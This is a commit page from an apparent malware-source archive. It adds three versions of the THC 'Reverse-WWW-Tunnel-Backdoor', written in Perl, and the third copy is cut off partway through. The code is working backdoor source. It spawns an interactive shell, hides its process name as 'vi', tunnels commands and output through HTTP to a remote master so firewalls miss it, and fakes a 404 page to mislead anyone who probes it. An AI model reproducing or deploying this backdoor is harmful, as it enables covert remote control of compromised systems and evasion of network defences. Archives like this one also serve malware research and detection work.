ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground 2020-10-09 21:59:39 -05:00 committed by GitHub
parent a5fc35f165
commit 06828a0956
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
87 changed files with 32994 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

338
Perl/Backdoor.Perl.AEI.16 Normal file
View File

@ -0,0 +1,338 @@
#
# Reverse-WWW-Tunnel-Backdoor v1.6
# (c) 1998 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
# Check out http://r3wt.base.org for updates
# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
# available at the website above in the "Articles" section.
#
# Greets to all THC, ADM, arF and #bluebox guys
# verified to work on Linux, Solaris, AIX and OpenBSD
# BUGS: some Solaris machines: select(3) is broken, won't work there
# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
# we can't make proper receive checks here. Workaround implemented.
#
# HISTORY:
# v1.6: included www-proxy authentication ;-))
# v1.4: porting to various unix types (and I thought perl'd be portable...)
# v1.3: initial public release of the paper including this tool
#
# GENERAL CONFIG (except for $MASK, everything must be the same
# for MASTER and SLAVE is this section!)
#
$CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char!
$MASK="vi"; # for masking the program's process name
$PASSWORD="THC"; # anything, nothing you have to rememeber
# (not a real "password" anyway)
#
# MASTER CONFIG (specific for the MASTER)
#
$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!)
#
# SLAVE CONFIG (specific for the SLAVE)
#
$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
$DELAY="3"; # time to wait for output after your command(s)
#$TIME="00:01"; # time when to connect to the master (unset if now)
#$DAILY="yes"; # tries to connect once daily if set with something
#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one
#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one
#$PROXY_USER="user"; # username for proxy authentication
#$PROXY_PASSWORD="pass"; # password for proxy authentication
#$DEBUG=""; # for debugging purpose, turn off when in production
$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris
# END OF CONFIG # nothing for you to do after this point #
################## BEGIN MAIN CODE ##################
require 5.002;
use Socket;
$|=1; # next line changes our process name
if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
undef $DAILY if (! $TIME);
if ( !($PROXY) || !($PROXY_PORT) ) {
undef $PROXY;
undef $PROXY_PORT;
}
$protocol = getprotobyname('tcp');
if ($ARGV[0] ne "") {
if ($ARGV[0] eq "-h") {
print STDOUT "no commandline option : daemon mode\n";
print STDOUT "using \"-h\" as option : this help\n";
print STDOUT "any other option : slave mode\n";
exit(0);
} else {
print STDOUT "starting in slave mode\n";
$SLAVE_MODE = "yeah";
}
}
if (! $SLAVE_MODE) {
&master;
} else {
&slave;
}
# END OF MAIN FUNCTION
############### SLAVE FUNCTION ###############
sub slave {
$pid = 0;
if ($PROXY) { # setting the real config (for Proxy Support)
$REAL_SERVER = $PROXY;
$REAL_PORT = $PROXY_PORT;
$REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT
. $CGI_PREFIX;
$PROXY_SUFFIX = "Pragma: no-cache\n";
if ( $PROXY_USER && USER_PASSWORD ) {
&base64encoding;
$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
}
} else {
$REAL_SERVER = $SERVER;
$REAL_PORT = $LISTEN_PORT;
$REAL_PREFIX = "GET " . $CGI_PREFIX;
}
AGAIN: if ($pid) { kill 9, $pid; }
if ($TIME) { # wait until the specified $TIME
$TIME =~ s/^0//; $TIME =~ s/:0/:/;
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" . $min;
while ($TIME ne $t) {
sleep(28); # every 28 seconds we look at the watch
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" .$min;
}
}
print STDERR "Slave activated\n" if $DEBUG;
if ($DAILY) { # if we must connect daily, we'll
if (fork) { # fork the daily shell process to
sleep(69); # ensure the master control process
goto AGAIN; # won't get stuck by a fucking cmd
} # the user executed.
print STDERR "forked\n" if $DEBUG;
}
$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
$remote = sockaddr_in($REAL_PORT, $address);
$forked = 0;
GO: close(THC);
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
if (! $forked) { # fork failed? fuck, let's try again
pipe R_IN, W_IN; select W_IN; $|=1;
pipe R_OUT, W_OUT; select W_OUT; $|=1;
$pid = fork;
if (! defined $pid) {
close THC;
close R_IN; close W_IN;
close R_OUT; close W_OUT;
goto GO;
}
$forked = 1;
}
if (! $pid) { # this is the child process (execs $SHELL)
close R_OUT; close W_IN; close THC;
print STDERR "forking $SHELL in child\n" if $DEBUG;
open STDIN, "<&R_IN";
open STDOUT, ">&W_OUT";
open STDERR, ">&W_OUT";
exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
close R_IN; close W_OUT;
exit(0);
} else { # this is the parent (data control + network)
close R_IN;
sleep($DELAY); # we wait $DELAY for the commands to complete
vec($rs, fileno(R_OUT), 1) = 1;
print STDERR "before: allwritten2stdin\n" if $DEBUG;
select($r = $rs, undef, undef, 30);
print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
sleep(1); # The following readin of the command output
$output = ""; # looks weird. It must be! every system
vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-((
print STDERR "before: readwhiledatafromstdout\n" if $DEBUG;
while (select($w = $ws, undef, undef, 1)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print STDERR "after : readwhiledatafromstdout\n" if $DEBUG;
print STDERR "before: fucksunprob\n" if $DEBUG;
vec($ws, fileno(W_OUT), 1) = 1;
while (! select(undef, $w=$ws, undef, 0.001)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print STDERR "after : fucksunprob\n" if $DEBUG;
print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG;
print W_OUT "\000" || goto ENDE;
print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
while (1) {
read R_OUT, $readout, 1 || last;
last if ($readout eq "\000");
$output = $output . $readout;
}
print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
&uuencode; # does the encoding of the shell output
$encoded = $REAL_PREFIX . $encoded;
$encoded = $encoded . $PROXY_SUFFIX if ($PROXY);
$encoded = $encoded . "\n";
print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
connect(THC, $remote) || goto ENDE; # connect to master
print STDERR "send encoded data, fail->exit\n" if $DEBUG;
send (THC, $encoded, 0) || goto ENDE; # and send data
$input = "";
vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
print STDERR "before: wait4answerfromremote\n" if $DEBUG;
while (! select($r = $rt, undef, undef, 0.00001)) {}
print STDERR "after : wait4answerfromremote\n" if $DEBUG;
print STDERR "read data from socket until eod\n" if $DEBUG;
$error="no";
while (1) { # read until EOD (End Of Data)
print STDERR "?" if $DEBUG;
# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
recv (THC, $readin, 1, 0) || undef $error;
if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
print STDERR "!" if $DEBUG;
goto OK if (($readin eq "\000") or ($readin eq "\n")
or ($readin eq ""));
$input = $input . $readin;
}
OK: print STDERR "\nall data read, entering OK\n" if $DEBUG;
$input =~ s/\n//gs;
&uudecode; # decoding the data from the master
print STDERR "if password not found -> exit\n" if $DEBUG;
goto ENDE if ( $decoded =~ m/^$PASSWORD/s == 0);
$decoded =~ s/^$PASSWORD//;
print STDERR "writing input data to $SHELL\n" if $DEBUG;
print W_IN "$decoded" || goto ENDE; # sending the data
sleep(1); # to the shell proc.
print STDERR "jumping to GO\n" if $DEBUG;
goto GO;
}
ENDE: kill 9, $pid; $pid = 0;
exit(0);
} # END OF SLAVE FUNCTION
############### MASTER FUNCTION ###############
sub master {
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
listen(THC, 3) || die "can't listen\n"; # print the HELP
print STDOUT '
Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ...
Introduction: Wait for your SLAVE to connect, examine it\'s output and then
type in your commands to execute on SLAVE. You\'ll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn\'t try to view binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don\'t like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.
';
YOP: print STDOUT "\nWaiting for connect ...";
$remote=accept (S, THC) || goto YOP; # get the connection
($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
$slave=gethostbyaddr($r_slave, AF_INET); # data.
$slave="unresolved" if ($slave eq "");
print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
select S; $|=1;
select STDOUT; $|=1;
$input = "";
vec($socks, fileno(S), 1) = 1;
$error="no";
while (1) { # read the data sent by the slave
while (! select($r = $socks, undef, undef, 0.00001)) {}
recv (S, $readin, 80, 0) || undef $error;
if ((! $error) and (! $BROKEN_RECV)) {
print STDOUT "[disconnected]\n";
}
$readin =~ s/\r//g;
$input = $input . $readin;
last if ( $input =~ m/\n\n/s );
}
&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
$input =~ s/^.*($CGI_PREFIX)\??//s;
$input =~ s/\n.*$//s;
&uudecode; # decoding the data from the slave
&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
$decoded =~ s/^$PASSWORD//s;
$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
print STDOUT "$decoded"; # showing the slave output to the user
$output = <STDIN>; # and get his input.
&uuencode; # encode the data for the slave
send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
close (S);
print STDOUT "sent.\n";
goto YOP; # wait for the next connect from the slave
} # END OF MASTER FUNCTION
###################### MISC. FUNCTIONS #####################
sub uuencode { # does the encoding stuff for error-free data transfer via WWW
$output = $PASSWORD . $output; # PW is for error checking and
$uuencoded = pack "u", "$output"; # preventing sysadmins from
$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
/'zcadefghjklmnopqrstuv' # data. No real
/; # security!
$uuencoded =~ tr/"'"/'b'/;
if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
$cut_length = 4099 - (length $REAL_PREFIX);
$uuencoded = pack "a$cut_length", $uuencoded
if ($codelength > 4111);
}
$encoded = $uuencoded;
$encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE);
} # END OF UUENCODE FUNCTION
sub uudecode { # does the decoding of the data stream
$input =~ tr/'zcadefghjklmnopqrstuv'
/'\n)=(:;&><,#$*%]!\@"`\\\-'
/;
$input =~ tr/'b'/"'"/;
$decoded = unpack "u", "$input";
} # END OF UUDECODE FUNCTION
sub base64encoding { # does the base64 encoding for proxy passwords
$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
$encoded_string = substr(pack('u', $encode_string), 1);
chomp($encoded_string);
$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
$padding = (3 - length($encode_string) % 3) % 3;
$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
} # END OF BASE64ENCODING FUNCTION
sub hide_as_broken_webserver { # invalid request -> look like broken server
send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
"<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
# END OF PROGRAM # (c) 1998 by <vh@reptile.rug.ac.be>

366
Perl/Backdoor.Perl.AEI.20 Normal file
View File

@ -0,0 +1,366 @@
#
# Reverse-WWW-Tunnel-Backdoor v2.0
# (c) 1998-2002 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
# Check out http://www.thehackerschoice.com
# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
# available at the website above in the "Articles" section.
#
# Greets to all THC, TESO, ADM and #bluebox guys
# verified to work on Linux, Solaris, AIX and OpenBSD
# BUGS: some Solaris machines: select(3) is broken, won't work there
# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
# we can't make proper receive checks here. Workaround implemented.
#
# HISTORY:
# v2.0: HTTP 1.0 protocol compliance (finally ;-)
# v1.6: included www-proxy authentication ;-))
# v1.4: porting to various unix types (and I thought perl'd be portable...)
# v1.3: initial public release of the paper including this tool
#
# GENERAL CONFIG (except for $MASK, everything must be the same
# for MASTER and SLAVE is this section!)
#
$MODE="POST"; # GET or POST
$CGI_PREFIX="/cgi-bin/orderform";# should look like a valid cgi.
$MASK="vi"; # for masking the program's process name
$PASSWORD="THC"; # anything, nothing you have to rememeber
# (not a real "password" anyway)
#
# MASTER CONFIG (specific for the MASTER)
#
$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!)
#
# SLAVE CONFIG (specific for the SLAVE)
#
$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
$DELAY="3"; # time to wait for output after your command(s)
#$TIME="14:39"; # time when to connect to the master (unset if now)
#$DAILY="yes"; # tries to connect once daily if set with something
#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one
#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one
#$PROXY_USER="user"; # username for proxy authentication
#$PROXY_PASSWORD="pass";# password for proxy authentication
#$DEBUG="yes"; # for debugging purpose, turn off when in production
$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris
# END OF CONFIG # nothing for you to do after this point #
################## BEGIN MAIN CODE ##################
require 5.002;
use Socket;
$|=1; # next line changes our process name
if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
undef $DAILY if (! $TIME);
if ( !($PROXY) || !($PROXY_PORT) ) {
undef $PROXY;
undef $PROXY_PORT;
}
$protocol = getprotobyname('tcp');
if ($ARGV[0] ne "slave" && $ARGV[0] ne "daemon" && $ARGV[0] ne "master" && $ARGV[1] eq "") {
print STDOUT "Proof-of-Concept Program for the paper \"Placing Backdoors through Firewalls\"\navailable at http://www.thehackerschoice.com in the \"Articles\" section.\n";
print STDOUT "Commandline options for rwwwshell:\n\tmaster\t- master mode\n\tslave\t- slave mode\n";
exit(0);
}
if ($ARGV[0] eq "slave") {
print STDOUT "starting in slave mode\n";
$SLAVE_MODE = "yeah";
}
# check for a correct mode
if ($MODE ne "GET" && $MODE ne "POST") {
print STDOUT "Error: MODE must either be GET or POST, re-edit this perl config\n";
exit(-1);
}
if (! $SLAVE_MODE) {
&master;
} else {
&slave;
}
# END OF MAIN FUNCTION
############### SLAVE FUNCTION ###############
sub slave {
$pid = 0;
$PROXY_SUFFIX = "Host: " . $SERVER . "\r\nUser-Agent: Mozilla/4.0\r\nAccept: text/html, text/plain, image/jpeg, image/*;\r\nAccept-Language: en\r\n";
if ($PROXY) { # setting the real config (for Proxy Support)
$REAL_SERVER = $PROXY;
$REAL_PORT = $PROXY_PORT;
$REAL_PREFIX = $MODE . " http://" . $SERVER . ":" . $LISTEN_PORT
. $CGI_PREFIX;
$PROXY_SUFFIX = $PROXY_SUFFIX . "Pragma: no-cache\r\n";
if ( $PROXY_USER && USER_PASSWORD ) {
&base64encoding;
$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
}
} else {
$REAL_SERVER = $SERVER;
$REAL_PORT = $LISTEN_PORT;
$REAL_PREFIX = $MODE . " " . $CGI_PREFIX;
}
$REAL_PREFIX = $REAL_PREFIX . "?" if ($MODE eq "GET");
$REAL_PREFIX = $REAL_PREFIX . " HTTP/1.0\r\n" if ($MODE eq "POST");
AGAIN: if ($pid) { kill 9, $pid; }
if ($TIME) { # wait until the specified $TIME
$TIME =~ s/^0//; $TIME =~ s/:0/:/;
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" . $min;
while ($TIME ne $t) {
sleep(28); # every 28 seconds we look at the watch
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" .$min;
}
}
print STDERR "Slave activated\n" if $DEBUG;
if ($DAILY) { # if we must connect daily, we'll
if (fork) { # fork the daily shell process to
sleep(69); # ensure the master control process
goto AGAIN; # won't get stuck by a fucking cmd
} # the user executed.
print STDERR "forked\n" if $DEBUG;
}
$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
$remote = sockaddr_in($REAL_PORT, $address);
$forked = 0;
GO: close(THC);
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
if (! $forked) { # fork failed? fuck, let's try again
pipe R_IN, W_IN; select W_IN; $|=1;
pipe R_OUT, W_OUT; select W_OUT; $|=1;
$pid = fork;
if (! defined $pid) {
close THC;
close R_IN; close W_IN;
close R_OUT; close W_OUT;
goto GO;
}
$forked = 1;
}
if (! $pid) { # this is the child process (execs $SHELL)
close R_OUT; close W_IN; close THC;
print STDERR "forking $SHELL in child\n" if $DEBUG;
open STDIN, "<&R_IN";
open STDOUT, ">&W_OUT";
open STDERR, ">&W_OUT";
exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
close R_IN; close W_OUT;
exit(0);
} else { # this is the parent (data control + network)
close R_IN;
sleep($DELAY); # we wait $DELAY for the commands to complete
vec($rs, fileno(R_OUT), 1) = 1;
print STDERR "before: allwritten2stdin\n" if $DEBUG;
select($r = $rs, undef, undef, 30);
print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
sleep(1); # The following readin of the command output
$output = ""; # looks weird. It must be! every system
vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-((
print STDERR "before: readwhiledatafromstdout\n" if $DEBUG;
while (select($w = $ws, undef, undef, 1)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print STDERR "after : readwhiledatafromstdout\n" if $DEBUG;
print STDERR "before: fucksunprob\n" if $DEBUG;
vec($ws, fileno(W_OUT), 1) = 1;
while (! select(undef, $w=$ws, undef, 0.001)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print STDERR "after : fucksunprob\n" if $DEBUG;
print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG;
print W_OUT "\000" || goto END_IT;
print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
while (1) {
read R_OUT, $readout, 1 || last;
last if ($readout eq "\000");
$output = $output . $readout;
}
print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
&uuencode; # does the encoding of the shell output
if ($MODE eq "GET") {
$encoded = $REAL_PREFIX . $encoded . " HTTP/1.0\r\n";
$encoded = $encoded . $PROXY_SUFFIX;
$encoded = $encoded . "\r\n";
} else { # $MODE is "POST"
$encoded = $REAL_PREFIX . $PROXY_SUFFIX
. "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
. $encoded . "\r\n";
}
print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
connect(THC, $remote) || goto END_IT; # connect to master
print STDERR "send encoded data, fail->exit\n" if $DEBUG;
send (THC, $encoded, 0) || goto END_IT; # and send data
$input = "";
vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
print STDERR "before: wait4answerfromremote\n" if $DEBUG;
while (! select($r = $rt, undef, undef, 0.00001)) {}
print STDERR "after : wait4answerfromremote\n" if $DEBUG;
print STDERR "read data from socket until eod\n" if $DEBUG;
$error="no";
# while (1) { # read until EOD (End Of Data)
print STDERR "?" if $DEBUG;
# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
recv (THC, $readin, 16386, 0) || undef $error;
# if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
print STDERR "!" if $DEBUG;
goto OK if (($readin eq "\000") or ($readin eq "\n")
or ($readin eq ""));
$input = $input . $readin;
# }
OK: print STDERR "\nall data read, entering OK\n" if $DEBUG;
print STDERR "RECEIVE: $input\n" if $DEBUG;
$input =~ s/.*\r\n\r\n//s;
print STDERR "BEFORE DECODING: $input\n" if $DEBUG;
&uudecode; # decoding the data from the master
print STDERR "AFTER DECODING: $decoded\n" if $DEBUG;
print STDERR "if password not found -> exit\n" if $DEBUG;
goto END_IT if ($decoded =~ m/^$PASSWORD/s == 0);
$decoded =~ s/^$PASSWORD//;
print STDERR "writing input data to $SHELL\n" if $DEBUG;
print W_IN "$decoded" || goto END_IT; # sending the data
sleep(1); # to the shell proc.
print STDERR "jumping to GO\n" if $DEBUG;
goto GO;
}
END_IT: kill 9, $pid; $pid = 0;
exit(0);
} # END OF SLAVE FUNCTION
############### MASTER FUNCTION ###############
sub master {
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
listen(THC, 3) || die "can't listen\n"; # print the HELP
print STDOUT '
Welcome to the Reverse-WWW-Tunnel-Backdoor v2.0 by van Hauser / THC ...
Introduction: Wait for your SLAVE to connect, examine it\'s output and then
type in your commands to execute on SLAVE. You\'ll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn\'t try to view binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don\'t like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.
';
YOP: print STDOUT "\nWaiting for connect ...";
$remote=accept (S, THC) || goto YOP; # get the connection
($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
$slave=gethostbyaddr($r_slave, AF_INET); # data.
$slave="unresolved" if ($slave eq "");
print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
select S; $|=1;
select STDOUT; $|=1;
$input = "";
vec($socks, fileno(S), 1) = 1;
$error="no";
# while (1) { # read the data sent by the slave
while (! select($r = $socks, undef, undef, 0.00001)) {}
recv (S, $readin, 16386, 0) || undef $error;
if ((! $error) and (! $BROKEN_RECV)) {
print STDOUT "[disconnected]\n";
}
# $readin =~ s/\r//g;
# $input = $input . $readin;
# last if ( $input =~ m/\r\n\r\n/s );
$input = $readin;
print STDERR "MASTER RECEIVE: $input\n" if $DEBUG;
# }
&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
if ( $input =~ m/^GET /s ) {
$input =~ s/^.*($CGI_PREFIX)\??//s;
$input =~ s/\r\n.*$//s;
} else { if ( $input =~ m/^POST /s ) {
$input =~ s/^.*\r\n\r\n//s;
} else { if ( $input =~ m/^HEAD /s ) {
&hide_as_broken_webserver;
} else {
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
} } }
print STDERR "BEFORE DECODING: $input\n" if $DEBUG;
&uudecode; # decoding the data from the slave
&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
$decoded =~ s/^$PASSWORD//s;
$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
print STDOUT "$decoded"; # showing the slave output to the user
$output = <STDIN>; # and get his input.
&uuencode; # encode the data for the slave
$encoded = "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain\r\n\r\n" . $encoded . "\r\n";
send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
close (S);
print STDOUT "sent.\n";
goto YOP; # wait for the next connect from the slave
} # END OF MASTER FUNCTION
###################### MISC. FUNCTIONS #####################
sub uuencode { # does the encoding stuff for error-free data transfer via WWW
$output = $PASSWORD . $output; # PW is for error checking and
$uuencoded = pack "u", "$output"; # preventing sysadmins from
$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
/'zcadefghjklmnopqrstuv' # data. No real
/; # security!
$uuencoded =~ tr/"'"/'b'/;
if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
$cut_length = 4099 - (length $REAL_PREFIX);
$uuencoded = pack "a$cut_length", $uuencoded
if ($codelength > 4111);
}
$encoded = $uuencoded;
} # END OF UUENCODE FUNCTION
sub uudecode { # does the decoding of the data stream
$input =~ tr/'zcadefghjklmnopqrstuv'
/'\n)=(:;&><,#$*%]!\@"`\\\-'
/;
$input =~ tr/'b'/"'"/;
$decoded = unpack "u", "$input";
} # END OF UUDECODE FUNCTION
sub base64encoding { # does the base64 encoding for proxy passwords
$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
$encoded_string = substr(pack('u', $encode_string), 1);
chomp($encoded_string);
$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
$padding = (3 - length($encode_string) % 3) % 3;
$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
} # END OF BASE64ENCODING FUNCTION
sub hide_as_broken_webserver { # invalid request -> look like broken server
send (S, "<HTML><HEAD>\r\n<TITLE>404 File Not Found</TITLE>\r\n</HEAD>".
"<BODY>\r\n<H1>File Not Found</H1>\r\n</BODY></HTML>\r\n", 0);
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
# END OF PROGRAM # (c) 1998-2002 by <vh@reptile.rug.ac.be>

334
Perl/Backdoor.Perl.AEI.a Normal file
View File

@ -0,0 +1,334 @@
#
# Reverse-WWW-Tunnel-Backdoor v1.6
# (c) 1998 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
# Check out http://r3wt.base.org for updates
# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
# available at the website above in the "Articles" section.
#
# Greets to all THC, ADM, arF and #bluebox guys
# verified to work on Linux, Solaris, AIX and OpenBSD
# BUGS: some Solaris machines: select(3) is broken, won't work there
# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
# we can't make proper receive checks here. Workaround implemented.
#
# HISTORY:
# v1.6: included www-proxy authentication ;-))
# v1.4: porting to various unix types (and I thought perl'd be portable...)
# v1.3: initial public release of the paper including this tool
#
# GENERAL CONFIG (except for $MASK, everything must be the same
# for MASTER and SLAVE is this section!)
#
$CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char!
$MASK="vi"; # for masking the program's process name
$PASSWORD="THC"; # anything, nothing you have to rememeber
# (not a real "password" anyway)
#
# MASTER CONFIG (specific for the MASTER)
#
$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!)
#
# SLAVE CONFIG (specific for the SLAVE)
#
$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
$DELAY="3"; # time to wait for output after your command(s)
#$TIME="00:01"; # time when to connect to the master (unset if now)
#$DAILY="yes"; # tries to connect once daily if set with something
#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one
#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one
#$PROXY_USER="user"; # username for proxy authentication
#$PROXY_PASSWORD="pass"; # password for proxy authentication
#$DEBUG=""; # for debugging purpose, turn off when in production
$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris
# END OF CONFIG # nothing for you to do after this point #
################## BEGIN MAIN CODE ##################
require 5.002;
use Socket;
$|=1; # next line changes our process name
if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
undef $DAILY if (! $TIME);
if ( !($PROXY) || !($PROXY_PORT) ) {
undef $PROXY;
undef $PROXY_PORT;
}
$protocol = getprotobyname('tcp');
if ($ARGV[0] ne "") {
if ($ARGV[0] eq "-h") {
print STDOUT "no commandline option : daemon mode\n";
print STDOUT "using \"-h\" as option : this help\n";
print STDOUT "any other option : slave mode\n";
exit(0);
} else {
print STDOUT "starting in slave mode\n";
$SLAVE_MODE = "yeah";
}
}
if (! $SLAVE_MODE) {
&master;
} else {
&slave;
}
# END OF MAIN FUNCTION
############### SLAVE FUNCTION ###############
sub slave {
$pid = 0;
if ($PROXY) { # setting the real config (for Proxy Support)
$REAL_SERVER = $PROXY;
$REAL_PORT = $PROXY_PORT;
$REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT
. $CGI_PREFIX;
$PROXY_SUFFIX = "Pragma: no-cache\n";
if ( $PROXY_USER && USER_PASSWORD ) {
&base64encoding;
$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
}
} else {
